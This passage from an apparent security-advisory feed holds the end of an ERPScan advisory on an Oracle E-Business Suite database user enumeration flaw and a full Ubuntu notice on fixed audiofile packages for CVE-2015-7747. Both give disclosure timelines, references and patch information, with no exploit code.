2015\r\n\r\n6. 
AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVulnerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. 
These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. 
ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari 
discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}